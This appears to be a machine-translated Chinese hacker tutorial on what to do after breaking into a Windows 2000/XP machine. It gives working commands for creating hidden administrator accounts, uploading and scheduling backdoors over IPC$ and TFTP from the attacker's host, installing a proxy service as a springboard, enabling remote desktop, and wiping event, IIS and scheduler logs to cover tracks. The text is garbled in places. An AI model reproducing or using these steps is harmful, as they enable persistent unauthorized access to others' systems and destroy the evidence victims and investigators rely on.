Intrusion system
◇文 / heiyeluren
We know that invading a system is sometimes more simple, but if you want to do the work after the invasion, it is not so easy, there is a saying that "playing Jiangshan is easy, defending Jiangshan is difficult", so invading a system after It is very important, and it needs to be done carefully. This article comes from this angle to tell those dishes if you get a system's permissions, I hope to have some help to them.
Description: (The system mentioned in this article "If there is no special instructions, it refers to the Windows2000 / WindowsXP system)
1. Get permissions (not in the scope of discussion, we only discuss what you have after intrusion system)
2. Establish super authority users
(1) Establish users:
Such as: Net User System $ HACKER / Add
NET localgroup administrators system $ / add
Note: The above two commands are to create a name called "system $", password "Hacker" super-authority user
(2) Cloning Super User:
You can use the CA tool to implement the super user, the premise is as long as the administrator rights of the target system is limited to the account number and password.
CA // ip Administrator Password IUSR_NAME Password
Description: Administrator - Administrator account password - password for administrator account
IUSR_NAME - User Password - Cloning User's Password
CCA: Check tools for cloning results.
CCA // IP User Password
User: Cloned account
Password: password
III. Establishing the back door
(1) Upload the latter program (more methods, only two commonly used):
Uploading the back door such as Wollf, Winshell, etc., it is best to add a shell in the back door, such as using UPX or aspack, etc., it is not easy to be killed by the virus firewall.
Methods to upload the back door:
(a) use IPC $: first establish a connection with the other party:
NET USE // Help Address / IPC $ "Password" / user: "User Name"
After the establishment is successful, you can upload the back door:
Copy C: /Hack/wollf.exe // ip / admin $
Description: Transmit to the wollf back door under your C to the other party's x: / winnt, or under the Windows directory
(b) Use TFTP: Prerequisites that you have entered the other party, such as you enter the other party through Telnet,
You can pass the back door to each other from your machine under the other's shell:
TFTP-I Your IP Get Wollf.exe
Description: Download Wollf.exe in your machine to the other party's system directory, the premise is that the other party does not ban TFTP and you have an independent IP address (the local area network machine is not line), your own machine opens the TFTPD32 FTP tool, it Monitor your 69-port connection, then you can download your machine on the other's machine.
(2) Run the back door:
(a) use the AT command:
First get the time of the other system: NET TIME // other ip
After the other party's time, use the AT command: AT // The time of the time of the other party IP back door is in the path of the other system
Example: at //192.168.0.1 11:02 c: /winnt/system32/wollf.exe
Note: You have to execute the AT command, the premise is that you have established an IPC $ connected to the other party, and you get the time of the other party, you must have a few minutes after running the back door. In addition to using the AT command, you can use one Tools called psexec.exe to implement the function of AT.
(b) Use "ventilation" "growers" to achieve copying and running the back door, this method you can refer to "Dream" help file
(c) Direct operation of the door:
You can run directly after you log in to the other party. For example, you can run directly after using Telnet into the other party.
If the other party does not open Telnet, then we can help it open.
Open the other party's Telnet:
We can use the Opentelnet.exe tool to implement, provided that the administrator privilege of the target system and IPC $,
The command is as follows:
Opentelnet // ip username password NTLMAUTHOR TELNETPORT Description: // ip - Target IP UserName - User Name Password - Password
NTLMAUTHOR - NTLM verification method telnetport - port
The verification method is: 0: The representative does not use NTLM verification 1: The representative first tries to use NTLM verification, and use password verification after failure 2: only use NTLM verification.
Once the execution is successful, you can use the Telnet other party IP port or the IP port of the NC -VV each other to log in to the target machine.
IV. Make a proxy server
Why don't you say agency, let's talk about how to make a proxy.
Here we use a tool SKSERVER.EXE, a proxy tool written by Snake, making a springboard good!
Write a batch first, the content is as follows:
@echo *******************************************************
@echo Installing the batch of the Socket agent
@echo by heiyeluren
@echo cqsn --- http://www.hackerxfiles.com/
@echo *******************************************************
@pause
@skserver -install
@echo install ... succeed!
@SKServer -Config Port 1983
@echo set port in 1983 ... succeed!
@SKServer -Config StartType 2
@echo set starttype is autostart ... succeed!
@NET START SKSERVER
@echo start service ... succeed!
@echo ok ... install end!
@pause
@exit
The above batch can be changed by the situation, and the SKSERVER can be changed to the name of the latter, but the "Net Start Skserver" cannot be changed, this is the default service name of the tool, and you can also change it into you. Required. After the SKSERVER.EXE is transmitted to the other party, then run the batch, you can connect the agent from the other party 1983 port, you can make a proxy server through SockCap, you can get up to 254th, who can find you, huh Ha ha ~~~
5. Open a super terminal
If the other party is the system of Win2000 Server or more, you can open the other party's super terminal to do better remote control. Everyone says that the 3389 broiler is the best. Now let's try! ~~
(1) Manual open terminal:
After entering the target system, enter the following content below: (Suppose the system is below C: / WinNT)
Echo [Components]> C: / 3389
echo tsenable = on >> C: / 3389
Sysocmgr /i:c:/winnt/inf/sysoc.inf / u: c: / 3389 / q
(You can add parameters / r, you can suppress reboots, restart after you are not installed) or you can write this file, then transfer to the other party:
[Components]
Tsenable = on
Saved as 3389 file, then run sysocmgr /i:c:/winnt/inf/sysoc.inf / u: c: / 3389 / q this command, you have a 3389 broiler after the other party, you can pass " Remote Desktop Connection to connect to each other, control each other from Windows.
(2) Utilize tools:
Here, a gadget called DixYxs.exe is used to open the other party's terminal.
Upload this tool to the other party, then execute the program: DixYXS.exe, wait for a break, the broiler will be restarted, and the terminal service will appear after restart.
6. Clear log
When you have all this, then you don't want to be found for three minutes? Then you should clear the log. Windows logs are: WWW log, FTP log, DNS log, security log, system log, application log, etc.
(1) Handmade clear log:
Some logs are be sure to delete, such as web, ftp and other logs.
Log file default location:
Application log, security log, system log, DNS log default location:% systemroot% / system32
/ Config, the default file size 512KB, administrator changes this default size.
Safety Log File:% SystemRoot% / System32 / Config / SECEVENT.EVT
System log file:% systemroot% / system32 / config / sysevent.evt
Application Log File:% SystemRoot% / System32 / Config / APPEVENT.EVT
IIS's FTP log default location:% systemroot% / system32 / logfiles / msftpsvc1 /, default a log
IIS WWW log default location:% systemroot% / system32 / logfiles / w3svc1 /, default a log
Scheduler Service Log Default Location:% SystemRoot% / Schedlgu.txt
After we stop the relevant service, we can delete it:
Stop service: Net Stop W3SVC
Then you can delete the log, the log of the WWW service is in: C: / Winnt / System32 / Logfiles / W3SVC1 directory; FTP service logs in the C: / WinNT / System32 / LogFiles / Msftpsvc1 directory. You can use DEL. :
Del C: / WinNT / System32 / Logfiles / W3SVC1 /*.* / Q
Del C: / Winnt / System32 / logfiles / msftpsvc1 /*.* / q
Then the Scheduler log, stop the service: Net Stop "Task Scheduler"
Then del c: /winnt/schedlgu.txt / q can be ~
The services like security logs, system logs, application logs, etc. are EventLog, which is unable to stop, so if we manually delete these logs, you must pass a very slow method:
Open the "Event Viewer" in the "Control Panel" "Operation" item in the menu has a menu named "Connect to another computer", click on it as shown below: Enter a remote computer IP, then wait for the last time (according to the network speed of both parties), then open the "Event Viewer" of the other party: Select the "security" log of the remote computer, right click on its properties: Click the "Clear log in the attribute" "Button, OK! The safety log is cleared! The same method clears the "system" log and "application" log!
(2) Use the tool to delete the log
Use the tool to delete those logs simple!
(A) Deleting the IIS service related WWW logs and FTP logs can use Cleaniislog.exe this gadget.
usage:
First use IPC $ pipes: NET USE // IP / IPC $ "password" / user: ""
Then you can use the following command:
Cleaniislog [logfile] | [.] [Cleanip] |.
Description: Clear log files,. Represents which IP address of all cleared logs,. Represents all IP records
Example: Cleaniislog. 127.0.0.1
a. You can clear the specified IP connection record and keep other IP records.
b. After the clearance is successful, Cleaniislog will clear the running record of its own in the system log.
Usage: Cleaniislog
Cleaniislog can only run locally and must have administrators permissions.
(B) Delete the security log, system log, and application logs, you can use Elsave.exe.
Instructions:
First use IPC $ pipes: NET USE // IP / IPC $ "password" / user: ""
Clear the application log of the target system:
Elsave -s // ip -l "application" -c
Clear the system log of the target system:
Elsave -s // ip -l "system" "-c
Clear the security log of the target system:
Elsave -s // ip -l "security" -c
(C) Logkiller.exe can delete all the logs of each other, including "Application Log", "Security Log", "System Log", IIS's FTP Service, IIS SMTP Service Log and IIS's WWW Service Log And the logs such as plan mission logs.
How to use: After the tool is uploaded to the other party, it runs directly.
Example: c: /winnt/system32/logkiller.exe
Seven.
Speaking of this, the work should be almost the work after an intrusion of a system. Of course, you have to do other jobs, not limited to the above mode, just above is a relatively basic commonly used Mode. For example, you can also set up VNC and other remote control software or make your FTP server to your FTP server, but the premise is that you must pay attention to safety, don't leave unnecessary traces.
I don't know if you find a situation, that is, we are all using a wide range of tools to complete our task, so you don't have to stop, but use too much tools, there is not much to our technology. Big progress, I hope everyone can use the tools. If you can use manual, try to use manual, so you will "know it, better", isn't it very good?
I may talk about some old things, maybe many masters don't want to see, huh, I think this position is in the dish, let everyone confuse these small problems. Not solve.
Discussions: The above is discussed, if any organization or individual uses the above method violates national law, will be sanctions to criminal law, and all the organizations or individuals have nothing to do with the author and the author.
"This article"
